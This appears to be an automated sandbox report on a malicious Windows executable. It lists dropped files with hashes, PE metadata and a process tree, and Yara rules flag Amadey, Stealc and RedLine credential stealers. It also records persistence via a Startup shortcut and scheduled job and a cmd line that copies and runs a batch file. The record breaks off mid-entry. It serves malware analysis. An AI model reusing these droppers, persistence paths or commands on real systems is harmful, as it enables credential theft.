MD5:	3F28E9C1BEA78819D76FE8691FDC9A93
SHA1:	24F29B1AD45CFE67EF3389226528E42F18DBB730
SHA-256:	5A97391AF9680A66EDCF4E221DB8E1F4E8061AE2F3E7820E7C601E670B0A747D
SHA-512:	EAADAD948EBA788900BF10E2E2F7269E9D169D39116C9881D6EDBDE1EA708721647338D653728B0C94086DC2230E24EFE6E36CCEBD8DDB5B115100D8D4638639
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.v........................@.......................... ...........@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.1600868246652265
Encrypted:	false
SSDEEP:
MD5:	131D164783DB3608E4B2E97428E17028
SHA1:	C00064A0F4952F5A37093CD7631F5921F9C00387
SHA-256:	05053F2A6DB0F5352295CE4CA7146618DDB175F1FF4CDCD93A055A039C098E5F
SHA-512:	020B22527D0E555509897CE2DF876BF2A30E3FC976CD86E52335104CF0F9DB152CAA8B46650A8BD0022B3CBAF3D20E0201322E3617E00EB0F25C6FCBA245C505
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N................0......r........... ........@.. ....................................@.....................................K........o........................................................................... ............... ..H............text...$.... ...................... ..`.rsrc....o.......p..................@..@.reloc...............N..............@..B........................H..........................................................................(.......(......(....*.0..........s......~....%:....&~......?...s....%.....(...+o.....80....o............%..F(.....%..G(.....%..H(.....%..e(.....(....o.....8......(.....s2.....s$.......~....}....~.........s....(....o....}......{.....I(....o....9.....I(......81......(....o....:......{....(....8......{....(........(....:.......o........(....o........o....(........{....(........(....:....s......s......

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\ProgramData\LgAmARwZ\Application.exe">), ASCII text
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.835479296672176
Encrypted:	false
SSDEEP:
MD5:	76F433B3FBD6C3D0CA94F50293292ECC
SHA1:	55CECBED8CB353B05CE046AD185488FBCB91BED8
SHA-256:	B04B8AD6F41D55D715FEE227F2C1E4D333627FF2A1B89C0F55E35384028F1B32
SHA-512:	829F24BD3474ABB436D4F685FC6EC8172B1D3AD548CFA71B3CD263B0A3FC353AE4CDD0AB925397FDB07BFA859E79711A6C0B7DBDD95B94B419FEDCE60090BDB6
Malicious:	true
Reputation:	unknown
Preview:	[InternetShortcut].URL="C:\ProgramData\LgAmARwZ\Application.exe"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ofHIebp8us.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	339456
Entropy (8bit):	6.125613076531882
Encrypted:	false
SSDEEP:
MD5:	FD381B2627904D8365229D1DDD7E221F
SHA1:	D7BCBABB6CD84875CC76F8170833AC679CD7D915
SHA-256:	ED5AC0C0D07595EB99CCC7346FAAB8504EB03000DA1012ABC1009C0CFBD4D4B9
SHA-512:	2B1E15B539D55B92F31C61CFF954DAFA61A44F7CCF75D113AB57AD54E9A8CBDE304A285D0583663A206F648FD4F3B63257DBEDF3DF608D0391353FFB4AA78DAF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0......N........... ........@.. ....................................@.................................p...K.......4K...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...4K.......L..................@..@.reloc.......`.......,..............@..B........................H.......@...........=...8...................................................(.......(......(......(....*.0..........s......~....%:....&~......<...s....%.....(...+o.....80....o............%..F(.....%..G(.....%..H(.....%..e(.....(....o.....8......(.....s/.....s5.......~....}....~.........s....(....o....}......{.....I(....o....9.....I(......81......(....o....:......{....(....8......{....(........(....:.......o........(....o........o....(........{....(........(....:....s.....

C:\Windows\SysWOW64\static.lib

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	400
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:
MD5:	8BD30F5E64692F2971D94D201A7BDDBC
SHA1:	1445B76763A443E3660BF686365374B5AA0407EA
SHA-256:	EF938B9C248649B6EB4C1532F87EF94A8179E15D56EB8BA68EF92BCE2E68B7C1
SHA-512:	37B0A14A1A21FD74BAD140477BE394816CD11D6778DE1007963B1EB9B81C0E246E1D779B40D3D863A6CB150AA4D5904D7492F607A8BE054B2D0281A78319CE56
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.3910159349221143
Encrypted:	false
SSDEEP:
MD5:	AFD5C5A32C0871EBA90BB2E616D6DC02
SHA1:	FA9770DB459113D61D0DAF12C0EC91EA1BA0D9F0
SHA-256:	92C7612B962FFAFBA67E20257A8059B60EB047ED1C4CD39EE348D449835532E2
SHA-512:	FBB96564F5E709FD1371776485F362E97892BE1637D2CD51A0E1556BF976EBEF8ADB67DF834E2E83C4EC3AA1C05E9E43E638825F8A7F82C49AE97FBB832D2BEA
Malicious:	false
Reputation:	unknown
Preview:	....H<.....M.....F.'F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.424700282589817
Encrypted:	false
SSDEEP:
MD5:	51C7D64EDA48985380D527DB83E61353
SHA1:	2C1C63E73BF64D590CAFCCE1704C3881D2364C93
SHA-256:	7A46581EE8800DCCDE82B601275518D4B882BC090D86A79F30747C4A57171FE1
SHA-512:	805393D7A82246C9552BF04333297E1A0CD0356FBB1157E3D2AEB33345E99F3A88941B6215F36FD8116B7AC09257A99E641F9B856AAAD0FD69049229D640B8F9
Malicious:	false
Reputation:	unknown
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....%(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94770125296494
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'910'272 bytes
MD5:	f257f5ef2a5f13cd994e48884b58af95
SHA1:	635975a431d3898aa6f4c049772b5082e6ad275e
SHA256:	f463bb94ce95ce298bf3d1ea7c262b22363061f6340f14c688d22cf696063f47
SHA512:	07f7072c1df049d3f5816790d4da719db4507f7fffb63f4767f4f73744c90202f7e04ebfc8569b1c79c7239170ae41e3002e762d2b57c756a354e9642220b2aa
SSDEEP:	49152:bdEDT3RwDlTE5j9+/emT+E7Ei7/Lt5Yge:bMh8E5xZMd/Lth
TLSH:	729533CC5F33712BCB4618BFC7C3210FEEE5062C15A2BAA5AF959679CE9A1DD5708804
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8A9D39800Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b19d4	0x10	iknsbfcc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b1984	0x18	iknsbfcc
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	b71ea19b725cb74b3b152b5e60e29618	False	0.997227307561308	data	7.980908097996731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	e8b28d76a49c17200292e3099389c878	False	0.578125	data	4.49697077729649	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a6000	0x200	6488381c5078ae0b45ea8d10e033e625	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iknsbfcc	0x311000	0x1a1000	0x1a0c00	9790f82df3ea89b4516220b9e430fac4	False	0.9941699160167966	data	7.9525167901551885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rwdyrkuv	0x4b2000	0x1000	0x400	409ca346e6048936da8ddfee475822c9	False	0.736328125	data	5.836048537448669	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b3000	0x3000	0x2200	e8dd9bc62e0cb31d5f0fbfc06b156130	False	0.06594669117647059	DOS executable (COM)	0.80888801150172	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b19e4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	00:07:06
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x570000
File size:	1'910'272 bytes
MD5 hash:	F257F5EF2A5F13CD994E48884B58AF95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2175084729.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2087722610.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:07:12
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x260000
File size:	1'910'272 bytes
MD5 hash:	F257F5EF2A5F13CD994E48884B58AF95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2158174762.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2198511022.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:07:12
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x260000
File size:	1'910'272 bytes
MD5 hash:	F257F5EF2A5F13CD994E48884B58AF95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2198640444.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2158216245.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:08:00
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x260000
File size:	1'910'272 bytes
MD5 hash:	F257F5EF2A5F13CD994E48884B58AF95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2626880890.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	00:08:04
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Imagebase:	0x240000
File size:	1'103'872 bytes
MD5 hash:	A5CF5DE46EC3F0A677E94188B19E7862
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:08:06
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Imagebase:	0x240000
File size:	1'103'872 bytes
MD5 hash:	A5CF5DE46EC3F0A677E94188B19E7862
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:08:06
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Imagebase:	0x240000
File size:	1'103'872 bytes
MD5 hash:	A5CF5DE46EC3F0A677E94188B19E7862
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:08:06
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 312
Imagebase:	0xb00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:08:07
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0x7ff6a5670000
File size:	314'368 bytes
MD5 hash:	68A99CF42959DC6406AF26E91D39F523
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000000.2686160117.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:08:07
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Roaming\ofHIebp8us.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\ofHIebp8us.exe"
Imagebase:	0xeb0000
File size:	339'456 bytes
MD5 hash:	FD381B2627904D8365229D1DDD7E221F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:08:07
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe"
Imagebase:	0x550000
File size:	348'160 bytes
MD5 hash:	131D164783DB3608E4B2E97428E17028
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:08:11
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000474001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000474001\gold.exe"
Imagebase:	0x3b0000
File size:	4'329'984 bytes
MD5 hash:	9E675BBAF944EEEE4F1E7428A5B22C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2813225946.0000000005CE0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2806606580.0000000004802000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:08:15
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x230000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:08:18
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Imagebase:	0x300000
File size:	7'824'384 bytes
MD5 hash:	563E12FFD633CFB480AB1F3153676D22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:08:20
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe"
Imagebase:	0x280000
File size:	527'360 bytes
MD5 hash:	A904AE8B26C7D421140BE930266ED425
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2910389172.00000000002AC000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:08:21
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x660000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.3026057510.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.3053254646.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:08:21
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 260
Imagebase:	0xb00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:08:26
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000802001\1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000802001\1.exe"
Imagebase:	0x980000
File size:	7'344'640 bytes
MD5 hash:	BF43ACACD11D09300691CF9449C386D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	00:08:30
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Imagebase:	0x400000
File size:	1'224'767 bytes
MD5 hash:	5D97C2475C8A4D52E140EF4650D1028B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:08:32
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:08:32
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	00:08:34
Start date:	27/10/2024
